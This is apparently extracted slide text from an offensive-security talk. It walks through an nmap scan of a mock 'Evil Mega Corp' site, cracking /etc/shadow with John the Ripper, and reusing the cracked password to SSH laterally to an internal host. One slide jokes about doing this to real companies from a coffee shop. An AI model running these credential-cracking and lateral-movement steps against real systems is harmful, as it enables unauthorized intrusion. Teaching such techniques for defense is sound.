actually hax in to real live companies. —Reconnaissance in to systems. —Lateral movement between systems. —REAL LIFE HOW SYSTEMS GET HACKED. —(you can go do this on real live systems, regrettably1) 1 may be illegal. Ask a grown up/lawyer/use a coﬀee shop.
( http://nmap.org ) Nmap scan report for www.evilmegacorp.co (184.108.40.206) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: WordPress 4.2.3 | http-robots.txt: 1 disallowed entry |_/ |_http-title: Evil Mega Corp | The most evil of mega corporations
(GNU/Linux 3.13.0-57-generic x86_64) * Documentation: https://help.ubuntu.com/ System information as of Sun Jul 26 03:02:12 EDT 2015 System load: 0.0 Processes: 67 Usage of /: 9.2% of 19.56GB Users logged in: 0 Memory usage: 14% IP address for eth0: 220.127.116.11 Swap usage: 0% IP address for eth1: 10.132.233.155 dave@boing:~$ cat .bash_history id ls ls -la vi .bash_profile ssh 10.132.236.169 dave@boing:~$
words, it will try them all and see if any match. root@boing# rm -f /root/.john/john.pot root@boing# john --wordlist=/usr/share/dict/wordlist.txt /etc/shadow Loaded 1 password hash (md5crypt [MD5 32/64 X2]) Press 'q' or Ctrl-C to abort, almost any other key for status yay dogs (dave) 1g 0:00:00:27 100% 0.03673g/s 10733p/s 10733c/s 10733C/s yay dogs
with the password, what do we get? dave@boing:~$ cat .ssh/known_hosts 10.132.236.169 ecdsa-sha2-nistp256 AAAAE2VjZ.... dave@boing:~$ ssh 10.132.236.169 email@example.com's password: dave@wordy:~$ id uid=1000(dave) gid=1000(dave) groups=1000(dave)